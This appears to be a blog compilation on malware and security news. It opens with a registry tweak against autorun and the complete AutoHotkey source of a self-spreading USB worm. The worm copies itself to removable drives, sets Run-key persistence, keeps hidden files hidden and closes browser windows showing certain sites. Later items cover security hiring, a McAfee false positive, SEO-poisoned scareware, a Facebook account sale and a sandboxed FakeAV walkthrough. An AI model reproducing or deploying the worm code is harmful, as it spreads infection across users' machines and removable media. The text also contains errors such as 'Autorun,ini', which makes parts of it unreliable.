Computer Forensics

One of the best ways of getting your computer infected is by sharing an actively infected Pen Drive or Memory Stick. When you insert a Memory stick or a CD, windows loks for the file called “Autorun,ini” in the device’s root directory. If it is found, it tries to execute it. A malware can easily create this file and help in its replication. Windows registry holds this setting whether to read the file autorun.ini or not. To change the setting,

Save this content in a .reg file and execute.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095

Now, after inserting this information to the registry, windows does not check for autorun.ini when you insert a device. Conversely, If you double-click the drive letter from “My Computer”, the “autorun.ini” still executes.

The AHK worm consists of 3 files along with the AHK compiler executable, consolidated as an archive, svchost.exe.

1. Contents of reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{

         FileCopydir,C:\heap41a\offspring,%element%:\,1
}

   }

}

regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon

ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt

Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt

return

2. Conrtents of script.txt


#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

3. Contents of “std.txt”

#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

4. Contents of “drivelist.txt”

c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z

?As corporations across the country have come to understand the nature of today’s fast-evolving cyberthreat landscape, many of them are now asking themselves the same question: What kind of security team does an organization need?

The modest recoveries in the economy and the painful security lessons of last year – like the theft of millions of credit card details or valuable intellectual property in single, calculated heists – have prompted companies of all sizes and in every sector to rethink their hiring priorities and step up their recruiting in cyber-security.
According to data from employment market information firm Wanted Technologies, cyber-security job openings across the country went up from 32,000 to 40,000 in the first three months of the year, a 25 percent increase.
“We’ve had the busiest quarter we’ve had in a number of years,” said Joyce Brocaglia, chief executive officer of information security recruitment firm Alta Associates. “We probably have a 50 percent-plus increase in the number of companies that are coming to us with security positions this year compare to the same period last year. It’s huge.”

Need increases

“The economy has been so poor in the last couple of years that companies working with skeleton crews and limited resources are at a point where they can’t continue handling risk management if they’re constantly understaffed,” he said. As a result, firms across all sectors – from e-commerce, financial services and health care to online gaming and government contractors – are thinking more about who’s handling their security.

Specialized skills

But finding the right people is not necessarily an easy job, because companies are looking for very specific skill sets in candidates, and those specialists are in short supply. Recruiters said their clients are mainly looking for people with experience in identity and access management and cloud computing. Alan Paller, director of research at the cyber-security training group SANS Institute, said organizations with large stakes in protecting against attacks are looking for skills necessary to detect evidence of attacks, such as forensics and reverse engineering.
For instance, Google, which is already praised in the security community for its strong team of experts, has advertised more than a dozen security positions on its job Web site and LinkedIn for several weeks. “Looking for high-quality security talent is always a focus of ours, but … we do have quite a few openings right now,” Google spokesman Jay Nancarrow said in an e-mail. “We definitely would like to grow our team to help us with a variety of important and challenging opportunities.”

Take your pick of jobs

Two renowned security researchers who asked to remain anonymous said Google recruiters have approached them and several colleagues. One of them said he was strongly considering the offer. “I’ve had more recruiters talk to me in the last couple of months than in all (of) 2009,” said the other researcher. “It is definitely an employee’s market right now. If you’re a high-profile security researcher, you can pick whoever you want to work with and you should be able to get in.” After a profitable third quarter last year, Google chief executive officer Eric Schmidt said the worst of the recession was over and that the company’s top priority would be investing in new hires, particularly of engineers and sales personnel. However, it is unclear if the recent security openings preceded or are related to the December cyberattack that Google said originated in China and that the New York Times reported this week was intended to seize the source code of the company’s password system.

Posts at big firms

“Your assumption is that Google, of all companies, would be able to defend itself, and it couldn’t,” Paller said. “In the aftermath of the China mess, they found out that the tools that people thought would protect them fail to protect against these advances threats.” Other Internet and technology giants like Amazon.com, eBay, Microsoft and Adobe Systems are also currently advertising dozens of security-related jobs in their Web sites. Brocaglia said having more people thinking about security also means more work for second-market organizations like security vendors and consultants that cater to small and medium businesses that need to outsource their security operations. “The world changed in the last couple of years, and the bad guys won. Now we need new security people to fill those gaps,” said Jeremiah Grossman, chief technology officer at Web application security firm WhiteHat, which is also hiring new personnel to meet the growing demand for their services.

Source: http://ow.ly/179VKD

Criminals have been keen to take advantage of the critical update bug that affected McAfee users in the past few days.

A false-positive in McAfee’s detection of the “Wecorl.A” virus caused hundreds of thousands of computers around the world to repeatedly reboot themselves, as the antivirus software falsely zapped (Quarantined) the windows critical “svchost.exe” file.

To its credit, McAfee is discussing the problem on its online community forum, has apologized, withdrawn the buggy update, and advised customers on how to manually fix the affected computers.

But that hasn’t stopped blackhat SEO hackers from creating poisoned Web pages that appear high in the search rankings if you hunt for information on the McAfee false-positive.

Clicking on one of these dangerous links can take you to a Website that harbors the FakeAV scareware (also known as fake or rogue antivirus) attack, designed to trick you into believing you have a serious security problem on your computer — and urging you to purchase or install other code from the hackers behind the scam.

If you have suffered from the false positive, then I suggest you visit only McAfee’s Website for advice — and not to go clicking on unknown links.

Source: http://ow.ly/179UEO

Kirllos, a person calls himself in the underground forum, a hacker is accused of being responsible for the theft of an unprecedented number of user accounts from Facebook. Researchers from iDefense group, company VeriSign, discovered recently that the hacker sold usernames and passwords on a networking forum through hacking. But what really drew attention was the amount of data that the criminal had for sale: 1.5 million accounts. The ratio of accounts will be simply 1 in 300 registered Facebook Account.

The VeriSign not yet confirmed if the bills sold in the forum are legitimate. Facebook has not commented on the situation. Second statement, if the data are real than Kirllos has the account information of about one in every 300 users of social networking. The price of market sales hacker ranges from $ 25 to $ 45 per thousand accounts, depending on the number of contacts for each user. According to the intelligence director’s cyber VerigSign, Rick Howard, yet the criminal seems to have sold about 700 000 accounts. “Hackers have sold the credentials of social networks for some time. We have seen an active trade names and passwords for VKontakte Russia, for example. But now the trend is to go behind global goals such as Facebook,” says Howard. According to security firm virtual, “Facebook has more than 400 million users worldwide. In the case of stroke, criminals send messages from a compromised account, telling friends that the owner is stuck in a foreign country and need money to go home, ”

On Wednesday (2010/04/21), millions of computers came to a dead halt when McAfee Antivirus falsely identified a normal Windows update file (svchost.exe) as infected with the malware name “Wecorl.a”, causing machines to either crash or enter an endless shutdown – reboot cycle. This false positive affected Windows XP SP3 systems, disabling computers in schools and hospitals, and even halting production lines in some industries.

McAfee quickly called the fix into action, dedicating its staff of more than 7,000 to fixing the problem. False detections occuring with antivirus detection is something which can’t be accepted.

The company’s official response to the false positive issue, from the McAfee website, is as follows:

• McAfee is aware that a number of customers have incurred a false positive error due to the release of the 5958 virus superdat definition file at 2:00 p.m. GMT+1 (6 a.m. PDT) on Wednesday, April 21.
• Our initial investigation indicates that the error can result in moderate to significant issues on systems running Windows XP Service Pack 3. If you are one of those impacted, we understand that this is a significant event for you and we’re very sorry.
• McAfee is taking every measure to prevent this from reoccurring.
• McAfee employees are working with the highest priority to support impacted customers. We have released updated virus definition files that do not contain the problem (DAT 5959 and higher) and are providing customers with detailed guidance on how to repair impacted systems.

Hackers of course quickly jumped on the bandwagon, putting up websites and adding SEO techniques that claimed to help you solve the problem but instead led straight to malicious links.

We use Google search for every instance in our life, it may be from gardening to university study to keeping ourselves updated. How about a search to get some details on the recent Iceland volcanic activity, and it leading to malware!! Dangerous isn’t it!! But this occasionally occurs!! We need to be careful with our sites we visit from Google search results. Google is taking the maximum efforts to reduce the search results going bad! But still we need to be careful of.

Today morning, while casually searching in Google for the recent updates on the volcanic activity in my opera browser, led me to a fantasy! A Message-box saying “Warning! Your computer is at risk of malware attacks”. Was happy! I caught a rogue, Fake-Alert. I thought of investigating it. Moved the message box sideways and found my Browser minimized under it. I have attached the screen-shot below in Firefox!

A message box prompting me that “Warning! Your system is at risk of malware attacks” and they assure that they will help me in strengthening my system. I was panicked. I agreed to its request by clicking OK to it. It then opened the Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

After the scanning is complete, it started alerting me that my system has a lot of problems and need to be fixed. Check the screenshot below. The problems reported were 1. registry to be fixed, 2. Remove outdated temporary junk files, 3. Hard disk Defragmentation, 4. Disk surface analysis, 5. Webpage download speed.

I clicked the message box and it prompted me to download and save the file named “packupdate_build30_287.exe”, and i did so. The MD5 of the file is

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now, I let the file execute. It started extracting.

After extracting a system scan started.

Finally,

My system is infected now!! Now panic at the extreme!! Wanting to fix it, clicked on “remove all”. It was kind to open a window asking me to buy the protection for 6 months (65.00$) or 1 year (100.00$).
Should I buy?

No, without any doubts. I know that I have executed the file in a clean built WinXP SP2 Virtual Machine test environment in non-persistent mode and there is no chance of it getting infected.